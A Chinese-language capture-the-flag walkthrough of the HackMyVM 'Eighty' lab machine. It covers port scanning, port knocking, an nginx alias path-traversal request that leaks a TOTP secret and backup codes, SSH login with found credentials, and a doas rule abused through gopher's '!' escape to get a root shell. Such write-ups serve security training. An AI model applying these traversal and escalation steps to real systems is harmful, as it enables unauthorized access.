打靶记录(九七)之HMVEighty

所渗透的靶机IP为192.168.56.122

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 13:52 UTC
Nmap scan report for 192.168.56.122 (192.168.56.122)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
22/tcp open     ssh
70/tcp open     gopher
80/tcp filtered http
MAC Address: 08:00:27:B7:3C:BC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds

sudo nmap -sT -sV -sC -O -p22,70,80 192.168.56.122                                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 13:55 UTC
Nmap scan report for 192.168.56.122 (192.168.56.122)
Host is up (0.00031s latency).

PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)
|   256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)
|_  256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)
70/tcp open     http    pygopherd web-gopher gateway
|_http-title: Gopher
| gopher-ls: 
|_[txt] /howtoconnect.txt "Connection"
80/tcp filtered http
MAC Address: 08:00:27:B7:3C:BC (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.32 seconds

80端口没有开放，在70端口开放了Gopher服务，gopher协议是在HTTP前的互联网协议。访问70端口没有发现特别的东西,上面的扫描结果中有一个/howtoconnect.txt

Ping us to: 4767 2343 3142

盲猜是需要knock的号码

knock 192.168.56.122 4767 2343 3142

Getshell

再次nmap扫描发现80端口打开了

访问80端口，在robots.txt找到/nginx_backup.txt

server {
        listen 80 default_server;
        listen [::]:80 default_server;
        root /var/www/html;
        index index.html index.htm index.nginx-debian.html;
        server_name _;
        location / {
                try_files $uri $uri/ =404;
        }
}

server {
server_name henry.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
        location /web {
                alias /home/henry/web/;
        }
  }

server {
server_name susan.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
        location /web {
                alias /home/susan/web/;
        }
  }

添加henry.eighty.hmv,susan.eighty.hmv,eighty.hmv到hosts，并且没有扫描到其他的hosts

因为web目录映射的是他们的家目录，所以尝试扫描目录

gobuster dir -u http://susan.eighty.hmv/web/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,php,html,bak 
===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================

[+] Url:                     http://susan.eighty.hmv/web/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,rar,zip,sql,txt,php,html

[+] Timeout:                 10s
===============================================================

Starting gobuster in directory enumeration mode
===============================================================

/index.html           (Status: 200) [Size: 40]
/lostpasswd.txt       (Status: 200) [Size: 50]

访问/lostpasswd.txt

8ycrois-tu0 + /home/susan/secret/.google-auth.txt

因为nginx配置文件中的/web目录而不是/web/，会导致目录穿越

访问 http://susan.eighty.hmv/web../secret/.google-auth.txt

2GN7KARBONVR55R7SP3UZPN3ZM
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
27074208
60216448
17908010

问了下chatgpt貌似是TOTP的身份验证机制

尝试ssh连接susan，提供了8ycrois-tu0作为密码之后又提供了71293338作为Verification code之后成功登录(貌似每次输入其中一条code就行)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-x 1 root root 42456 Apr  7  2021 /usr/local/bin/doas
-rwxr-sr-x 1 root shadow 39616 Feb 14  2019 /usr/sbin/unix_chkpwd
-rwsr-xr-- 1 root messagebus 51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 54096 Jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 84016 Jul 27  2018 /usr/bin/gpasswd
-rwxr-sr-x 1 root tty 34896 Jan 10  2019 /usr/bin/wall
-rwxr-sr-x 1 root shadow 71816 Jul 27  2018 /usr/bin/chage
-rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 34888 Jan 10  2019 /usr/bin/umount
-rwsr-xr-x 1 root root 63568 Jan 10  2019 /usr/bin/su
-rwxr-sr-x 1 root tty 14736 May  4  2018 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 44440 Jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44528 Jul 27  2018 /usr/bin/chsh
-rwxr-sr-x 1 root ssh 321672 Jan 31  2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mail 18944 Dec  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 43568 Oct 11  2019 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31000 Jul 27  2018 /usr/bin/expiry
-rwsr-xr-x 1 root root 51280 Jan 10  2019 /usr/bin/mount

提权

发现有一个/usr/local/bin/doas二进制程序，类似与sudo的一个轻量提权文件

find / -name "*doas*" 2>/dev/null
/usr/local/etc/doas.conf
/usr/local/share/man/man1/doas.1
/usr/local/share/man/man8/vidoas.8
/usr/local/share/man/man5/doas.conf.5
/usr/local/bin/vidoas
/usr/local/bin/doas

cat /usr/local/etc/doas.conf
permit nolog susan as root cmd gopher

发现susan用户可以以root身份执行gopher指令

doas -u root gopher localhost 70

进入之后之后输入一个”!”号就可以切换至rootSHELL!!

碎碎念

了解了一下这个比较原始的gopher协议以及nginx的配置文件导致的目录穿越漏洞。还有doas